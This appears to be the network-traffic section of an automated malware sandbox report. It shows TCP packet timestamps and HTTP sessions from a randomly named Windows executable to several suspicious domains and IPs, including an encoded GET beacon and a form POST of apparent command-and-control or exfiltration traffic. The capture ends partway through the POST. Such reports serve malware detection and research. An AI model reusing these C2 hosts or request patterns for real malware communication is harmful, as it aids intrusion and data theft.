                                                                                                        Dec 2, 2024 14:38:10.524281979 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:10.534256935 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:10.654124975 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.840359926 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.840380907 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.840395927 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.840424061 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.840436935 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.840444088 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.840455055 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.840471983 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.840590954 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:11.840636969 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:11.840642929 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.840657949 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.840707064 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:11.960932016 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.961016893 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:11.961225986 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:11.965095043 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.010128021 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.043262005 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.043298960 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.043472052 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.047386885 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.047450066 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.047713041 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.055819035 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.055926085 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.056041002 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.064513922 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.064614058 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.064718008 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.072669029 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.072797060 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.072910070 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.081089020 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.081237078 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.081332922 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.089462996 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.089484930 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.089595079 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.097754955 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.097820044 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.097912073 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.106323957 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.106400013 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.106515884 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.114588976 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.114696980 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.114798069 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.130255938 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.130322933 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.130465031 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.163657904 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.163806915 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.163940907 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.244482994 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.244602919 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.244726896 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.246877909 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.247050047 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.247186899 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.251919031 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.252027988 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.252136946 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.257253885 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.257482052 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.257601023 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.262164116 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.262326002 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.262435913 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.267357111 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.267386913 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.267494917 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.273106098 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.273130894 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.273257017 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.277643919 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.277673006 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.277777910 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.282747984 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.282851934 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.282983065 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.287753105 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.287866116 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.287972927 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.292911053 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.292989969 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.293087006 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.298069954 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.298125029 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.298213005 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.301867008 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.301996946 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.302095890 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.305692911 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.305773020 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.305867910 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.309571028 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.309673071 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.309779882 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.313505888 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.313568115 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.313653946 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.317166090 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.317212105 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.317325115 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.445844889 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.445883036 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.446037054 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.447431087 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.447489977 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.447566986 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.450551033 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.450654984 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.450766087 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.453702927 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.453902960 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.453991890 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:38:12.456880093 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.457190990 CET80498955.39.10.93192.168.2.6
                                                                                                        Dec 2, 2024 14:38:12.457299948 CET4989580192.168.2.65.39.10.93
                                                                                                        Dec 2, 2024 14:39:12.756997108 CET5001480192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:12.877608061 CET80500143.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:18.417188883 CET5001580192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:18.537188053 CET80500153.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:18.542418003 CET5001580192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:18.561003923 CET5001580192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:18.681046009 CET80500153.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:19.684990883 CET80500153.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:19.685126066 CET5001580192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:20.072880030 CET5001580192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:20.192867994 CET80500153.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:21.092825890 CET5001780192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:21.212955952 CET80500173.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:21.213102102 CET5001780192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:21.231775045 CET5001780192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:21.352055073 CET80500173.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:22.356283903 CET80500173.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:22.359225035 CET5001780192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:22.747158051 CET5001780192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:22.867182016 CET80500173.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:23.764401913 CET5001880192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:23.884381056 CET80500183.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:23.884597063 CET5001880192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:23.902400970 CET5001880192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:24.022424936 CET80500183.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:24.022479057 CET80500183.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:25.072813988 CET80500183.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:25.072866917 CET5001880192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:25.416609049 CET5001880192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:25.536673069 CET80500183.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:26.435373068 CET5001980192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:26.558588028 CET80500193.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:26.558762074 CET5001980192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:26.573471069 CET5001980192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:26.696269989 CET80500193.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:27.662194014 CET80500193.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:27.662303925 CET80500193.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:27.662405968 CET5001980192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:27.665736914 CET5001980192.168.2.63.33.130.190
                                                                                                        Dec 2, 2024 14:39:27.787311077 CET80500193.33.130.190192.168.2.6
                                                                                                        Dec 2, 2024 14:39:33.853832006 CET5002080192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:34.011516094 CET805002047.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:34.011651993 CET5002080192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:34.032985926 CET5002080192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:34.153016090 CET805002047.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:35.541606903 CET5002080192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:35.709899902 CET805002047.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:36.560590982 CET5002180192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:36.680777073 CET805002147.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:36.683276892 CET5002180192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:36.699934006 CET5002180192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:36.819932938 CET805002147.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:38.213542938 CET5002180192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:38.373907089 CET805002147.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:39.233123064 CET5002280192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:39.353060961 CET805002247.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:39.353138924 CET5002280192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:39.370096922 CET5002280192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:39.491197109 CET805002247.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:39.491266966 CET805002247.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:40.885385036 CET5002280192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:41.049129009 CET805002247.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:41.904834986 CET5002380192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:42.025614977 CET805002347.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:42.025758028 CET5002380192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:42.045149088 CET5002380192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:42.165612936 CET805002347.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:55.919307947 CET805002047.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:55.919383049 CET5002080192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:39:58.647094965 CET805002147.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:39:58.649174929 CET5002180192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:40:01.247657061 CET805002247.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:40:01.247720003 CET5002280192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:40:03.919306040 CET805002347.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:40:03.919439077 CET5002380192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:40:03.920293093 CET5002380192.168.2.647.238.157.253
                                                                                                        Dec 2, 2024 14:40:04.044935942 CET805002347.238.157.253192.168.2.6
                                                                                                        Dec 2, 2024 14:40:09.438901901 CET5002580192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:09.558985949 CET805002567.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:09.559087038 CET5002580192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:09.588248014 CET5002580192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:09.708363056 CET805002567.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:10.781769037 CET805002567.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:10.782011986 CET805002567.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:10.782145023 CET5002580192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:11.104279995 CET5002580192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:12.123323917 CET5002680192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:12.243330956 CET805002667.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:12.247469902 CET5002680192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:12.262773037 CET5002680192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:12.383843899 CET805002667.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:13.518690109 CET805002667.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:13.518779993 CET805002667.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:13.518955946 CET5002680192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:13.777151108 CET5002680192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:14.797194004 CET5002780192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:14.917224884 CET805002767.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:14.917459965 CET5002780192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:14.933132887 CET5002780192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:15.053119898 CET805002767.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:15.053663015 CET805002767.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:16.194259882 CET805002767.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:16.194443941 CET805002767.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:16.194628000 CET5002780192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:16.448257923 CET5002780192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:17.467675924 CET5002880192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:17.588016033 CET805002867.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:17.588109970 CET5002880192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:17.599652052 CET5002880192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:17.720365047 CET805002867.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:18.811355114 CET805002867.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:18.811466932 CET805002867.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:18.811722994 CET5002880192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:18.814647913 CET5002880192.168.2.667.223.117.169
                                                                                                        Dec 2, 2024 14:40:18.934606075 CET805002867.223.117.169192.168.2.6
                                                                                                        Dec 2, 2024 14:40:24.584052086 CET5002980192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:24.705699921 CET805002985.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:24.705903053 CET5002980192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:24.729211092 CET5002980192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:24.849236965 CET805002985.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:26.244875908 CET5002980192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:26.365211964 CET805002985.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:26.365557909 CET5002980192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:27.264108896 CET5003080192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:27.384082079 CET805003085.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:27.384215117 CET5003080192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:27.402673006 CET5003080192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:27.522902966 CET805003085.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:28.917218924 CET5003080192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:29.037806034 CET805003085.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:29.037940025 CET5003080192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:29.937592030 CET5003180192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:30.057864904 CET805003185.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:30.058000088 CET5003180192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:30.076677084 CET5003180192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:30.196762085 CET805003185.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:30.196793079 CET805003185.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:31.588701963 CET5003180192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:31.709120989 CET805003185.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:31.709178925 CET5003180192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:32.607717991 CET5003280192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:32.727670908 CET805003285.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:32.727799892 CET5003280192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:32.738020897 CET5003280192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:32.858042002 CET805003285.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:34.108509064 CET805003285.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:34.109057903 CET805003285.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:34.109265089 CET5003280192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:34.156435013 CET5003280192.168.2.685.159.66.93
                                                                                                        Dec 2, 2024 14:40:34.276537895 CET805003285.159.66.93192.168.2.6
                                                                                                        Dec 2, 2024 14:40:39.759699106 CET5003380192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:39.879683018 CET8050033162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:39.879760027 CET5003380192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:39.986907959 CET5003380192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:40.107320070 CET8050033162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:41.494889021 CET5003380192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:41.528103113 CET8050033162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:41.528363943 CET5003380192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:41.528464079 CET8050033162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:41.528548002 CET5003380192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:41.615710020 CET8050033162.159.140.104192.168.2.6
                                                                                                        Dec 2, 2024 14:40:41.615822077 CET5003380192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:42.895970106 CET5003480192.168.2.6162.159.140.104
                                                                                                        Dec 2, 2024 14:40:43.016103983 CET8050034162.159.140.104192.168.2.6
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49786 | 185.106.176.204 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:37:21.827713013 CET | 548 | OUT | GET /enzp/?aNXP_jw=cVkvAZaY29GpnsZyqIF2yuifFE7HKV6pnqAC3WUldb4fq/7Oh6qhLNzjv12xoDmrSb6mv5wmBpstJhqJzvfwudLk3JbApDF6kA+gMwLx/u/2nNZzSM95XnZVFjyCoQq4ImYZsuE=&cTT8u=Q4NHoHJ0 HTTP/1.1
                                                                                                        Host: www.sidqwdf.fun
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
Dec 2, 2024 14:37:23.348037004 CET | 720 | IN | HTTP/1.1 404 Not Found
                                                                                                        Server: nginx/1.26.1
                                                                                                        Date: Mon, 02 Dec 2024 13:37:23 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Content-Length: 555
                                                                                                        Connection: close
                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49823 | 3.33.130.190 | 80 | 2488 | C:\Program Files (x86)\YZdbVpHrzDdbUaBfnvsINfTzKzGQOMiAjZaAhLHBOnPRvoWKTcNENgdobPWXGrC\LfvKCNKdvt.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 14:37:39.299262047 CET | 822 | OUT | POST /08fk/ HTTP/1.1
                                                                                                        Host: www.swenansiansie.xyz
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Origin: http://www.swenansiansie.xyz
                                                                                                        Referer: http://www.swenansiansie.xyz/08fk/
                                                                                                        Content-Length: 212
                                                                                                        Connection: close
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cache-Control: max-age=0
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
